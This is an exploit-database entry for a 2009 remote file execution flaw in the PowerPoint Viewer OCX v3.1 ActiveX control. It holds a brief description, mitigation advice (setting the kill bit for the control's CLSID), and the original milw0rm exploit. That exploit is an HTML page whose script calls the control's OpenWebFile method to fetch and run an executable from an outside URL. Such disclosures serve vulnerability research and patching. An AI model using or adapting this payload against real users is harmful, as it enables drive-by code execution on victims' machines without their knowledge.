header-logo
Suggest Exploit
vendor:
PowerPoint Viewer OCX
by:
Cyber-Zone
9.3
CVSS
HIGH
Remote File Execution
94
CWE
Product Name: PowerPoint Viewer OCX
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: No
Related CWE: N/A
CPE: a:microsoft:powerpoint_viewer_ocx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PowerPoint Viewer OCX v3.1 Remote File Execution Exploit

This exploit allows a remote attacker to execute arbitrary code on a vulnerable system by using the OpenWebFile method of the PowerPoint Viewer OCX v3.1 ActiveX control. The attacker can use this vulnerability to execute arbitrary code on the vulnerable system by tricking a user into visiting a malicious web page.

Mitigation:

Disable the PowerPoint Viewer OCX v3.1 ActiveX control in Internet Explorer or set the kill bit for the CLSID {97AF4A45-49BE-4485-9F55-91AB40F22B92}.
Source

Exploit-DB raw data:

PowerPoint Viewer OCX v3.1 Remote File Execution Exploit

Founded By : Cyber-Zone
E-mail     : Paradis_des_fous@hotmail.fr
Home       : WwW.Exploiter5.CoM
GreetZ     : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum



<HTML>
<BODY>
 <object id=Cyb classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22B92}"></object>

<SCRIPT>

function Do_it()
 {
   File = "http://test.com/file.exe"
   Cyb.OpenWebFile(File)
 }


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

# milw0rm.com [2009-01-13]